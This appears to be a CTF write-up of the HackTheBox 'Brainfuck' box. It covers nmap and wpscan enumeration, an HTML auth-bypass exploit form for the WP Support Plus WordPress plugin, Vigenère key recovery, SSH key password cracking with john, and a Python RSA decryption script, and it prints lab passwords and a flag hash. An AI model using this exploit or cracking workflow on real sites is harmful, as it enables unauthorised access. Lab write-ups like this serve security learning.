The BrainFuck was a nice quick box to go through on the hackthebox site. It was rated insane but it felt more like a medium box. The box had 2 virtual name servers which had two different sites. One was Wordpress and the other was text forum based on flarum. We had to exploit both the servers to gain SSH access to the box. The box also had an SMTP server that was not intended for exploitation but to merely interact. so let’s get started!
we start with the Nmap scan, so see which all ports are open on the box.
# Nmap 7.80 scan initiated Thu Mar 26 22:25:36 2020 as: Nmap -sC -sV -oN Nmap/brainfuck 10.10.10.17
Nmap scan report for 10.10.10.17
Host is up (0.41s latency).
Not shown: 995 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 94:d0:b3:34:e9:a5:37:c5:ac:b9:80:df:2a:54:a5:f0 (RSA)
| 256 6b:d5:dc:15:3a:66:7a:f4:19:91:5d:73:85:b2:4c:b2 (ECDSA)
|_ 256 23:f5:a3:33:33:9d:76:d5:f2:ea:69:71:e3:4e:8e:02 (ED25519)
25/tcp open smtp?
|_smtp-commands: Couldn't establish connection on port 25
110/tcp open pop3 Dovecot pop3d
143/tcp open tcpwrapped
443/tcp open https nginx/1.10.0 (Ubuntu)
|_http-server-header: nginx/1.10.0 (Ubuntu)
| ssl-cert: Subject: commonName=brainfuck.htb/organizationName=Brainfuck Ltd./stateOrProvinceName=Attica/countryName=GR
| Subject Alternative Name: DNS:www.brainfuck.htb, DNS:sup3rs3cr3t.brainfuck.htb
| Not valid before: 2017-04-13T11:19:29
|_Not valid after: 2027-04-11T11:19:29
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
| tls-nextprotoneg:
|_ http/1.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Mar 26 22:27:18 2020 -- 1 IP address (1 host up) scanned in 101.55 secondsThe Nmap reveals some interesting ports such as 25 and 110 which are for SMTP (Simple Mail Transfer Protocol) and POP (Post Office Protocol) respectively. Since port 443 which https is also open let’s start with that as it has a wider attack surface.
The webpage by default showed the Nginx default page. So let’s start with examing the SSL certificate for information such as usernames, email, domain name, etc. On examining the SSL certificate we found an email address and some DNS names
E = orestis@brainfuck.htb
CN = brainfuck.htb
OU = IT
O = Brainfuck Ltd.
L = Athens
ST = Attica
C = GR
======================================
DNS Name: www.brainfuck.htb
DNS Name: sup3rs3cr3t.brainfuck.htbNow lets update our /etc/hosts file with these enteries and examine the webpage again. Now we find two different content manager running on the two dns names.
The www.brainfuck.htb has a WordPress running so we will use wpscan to examine it and the other has text forum which on some googling around revealed was running flarum. The text forum looks like it will require login credentials for further enumeration. Thus we will ignore it for now.
Examining the wordpress scan output we get a bunch of details.
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.7.9
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
URL: https://brainfuck.htb/ [10.10.10.17]
Started: Fri Mar 27 18:07:57 2020
Interesting Finding(s):
Headers
| Interesting Entry: Server: nginx/1.10.0 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
XML-RPC seems to be enabled: https://brainfuck.htb/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
https://brainfuck.htb/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
https://brainfuck.htb/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
WordPress version 4.7.3 identified (Insecure, released on 2017-03-06).
| Found By: Rss Generator (Passive Detection)
| - https://brainfuck.htb/?feed=rss2, <generator>https://wordpress.org/?v=4.7.3</generator>
| - https://brainfuck.htb/?feed=comments-rss2, <generator>https://wordpress.org/?v=4.7.3</generator>
WordPress theme in use: proficient
| Location: https://brainfuck.htb/wp-content/themes/proficient/
| Last Updated: 2020-03-02T00:00:00.000Z
| Readme: https://brainfuck.htb/wp-content/themes/proficient/readme.txt
| The version is out of date, the latest version is 3.0.15
| Style URL: https://brainfuck.htb/wp-content/themes/proficient/style.css?ver=4.7.3
| Style Name: Proficient
| Description: Proficient is a Multipurpose WordPress theme with lots of powerful features, instantly giving a prof...
| Author: Specia
| Author URI: https://speciatheme.com/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.0.6 (80% confidence)
| Found By: Style (Passive Detection)
| - https://brainfuck.htb/wp-content/themes/proficient/style.css?ver=4.7.3, Match: 'Version: 1.0.6'
Enumerating All Plugins (via Passive Methods)
Checking Plugin Versions (via Passive and Aggressive Methods)
Plugin(s) Identified:
wp-support-plus-responsive-ticket-system
| Location: https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/
| Last Updated: 2019-09-03T07:57:00.000Z
| The version is out of date, the latest version is 9.1.2
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 7.1.3 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/readme.txt
Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups -: |========================================================================================================================================|
No Config Backups Found.
No WPVulnDB API Token given, as a result, vulnerability data has not been output.
You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up
Finished: Fri Mar 27 18:08:13 2020
Requests Done: 53
Cached Requests: 5
Data Sent: 11.692 KB
Data Received: 161.223 KB
Memory used: 182.68 MB
Elapsed time: 00:00:15we find that WordPress is vulnerable to the exploit https://www.exploit-db.com/exploits/41006 which will give the admin token with the password. Thus editing the exploit to suit our needs will giving us the following exploit code.
<form method="post" action="http://www.brainfuck.htb/wp-admin/admin-ajax.php">
Username: <input type="text" name="username" value="administrator">
<input type="hidden" name="email" value="sth">
<input type="hidden" name="action" value="loginGuestFacebook">
<input type="submit" value="Login">
</form>Save it in a html file and open it with firefox and once done, go to wp-admin to view the dashboard. Enumerating the wordpress dashboard we find the smtp password. You view its value by using web browser’s tool and inspecting the value. We get the credentials as
username: orestis@brainfuck.htb
password: kHGuERB29DNiNESince we SMTP credentials now let’s open the Blue Bird and login into the SMTP server. Login is fairly simple.
Just log in with username orestis and email as orestis@brainfuck.htb and password.
Once in we find an email talking about the credentials of the text forum we found earlier. We find the credentials as the following.
username: orestis
password: kIEnnfEKJ#9UmdOExploring the text forum we find them talking about the SSH Key in some sort of vignere encrypted key. Using Open Source tools such as dcode.fr does not work as we don’t know the key. But we have something that looks like a URL.
Since it is a URL and has 4 letters in the starting then it must start with https. Based on that we can derive a partial key, which in our case will be
FUCKMNow using the dcode.fr we can derive the rest of the key. Enter this key in Knowing Partial Key section and paste the encrypted text. Thus we will rest of the key as:
FUCKMYBRAINNow since we know the Vignere key let’s get ssh key URL and download the key.
Once we get the SSH key it is encrypted with some password. Using ssh2john to convert the key to a hash and then using john with the RockYou wordlist gets us the password.
ssh2john id.rsa > hash
john --wordlist=~/rockyou hash
password found: 3poulakia!
We use that password and boom! we are in. And can read the user.txt file
cat user.txt
2c11cfbc5b959f73ac15a3310bd097c9In the home direcotry of the user orestis we find a file named encrypt.sage . On some enumeration, I found that it a scientific mathematical programming language that is used to calculations. But fortunately, it looks an RSA implementation and python can be used to decode the encrypted file.
nbits = 1024password = open("/root/root.txt").read().strip()
enc_pass = open("output.txt","w")
debug = open("debug.txt","w")
m = Integer(int(password.encode('hex'),16))p = random_prime(2^floor(nbits/2)-1, lbound=2^floor(nbits/2-1), proof=False)
q = random_prime(2^floor(nbits/2)-1, lbound=2^floor(nbits/2-1), proof=False)
n = p*q
phi = (p-1)*(q-1)
e = ZZ.random_element(phi)
while gcd(e, phi) != 1:
e = ZZ.random_element(phi)c = pow(m, e, n)
enc_pass.write('Encrypted Password: '+str(c)+'\n')
debug.write(str(p)+'\n')
debug.write(str(q)+'\n')
debug.write(str(e)+'\n')
We have the things need to decode the RSA in debug file. So decoding the RSA encrypted text it should give us the root.txt file hash.
I wrote a script in python that will help us to decode this RSA encryption.
from Crypto.Util.number import inverse, long_to_bytes
p = 7493025776465062819629921475535241674460826792785520881387158343265274170009282504884941039852933109163193651830303308312565580445669284847225535166520307
q = 7020854527787566735458858381555452648322845008266612906844847937070333480373963284146649074252278753696897245898433245929775591091774274652021374143174079
e = 30802007917952508422792869021689193927485016332713622527025219105154254472344627284947779726280995431947454292782426313255523137610532323813714483639434257536830062768286377920010841850346837238015571464755074669373110411870331706974573498912126641409821855678581804467608824177508976254759319210955977053997
enc = 44641914821074071930297814589851746700593470770417111804648920018396305246956127337150936081144106405284134845851392541080862652386840869768622438038690803472550278042463029816028777378141217023336710545449512973950591755053735796799773369044083673911035030605581144977552865771395578778515514288930832915182
phi = (p-1)*(q-1)
d = inverse(e,phi)
mess = pow(enc,d,p*q)
mess = hex(mess)
print mess
print "password found"
print str(mess).split('0x')[1][:-1].decode('hex')Thus this gives the root.txt hash. I tired to get the root shell but it was not intended and i did’nt find any reliable path.
Thus this was the box and will upload other linux OSCP boxes later.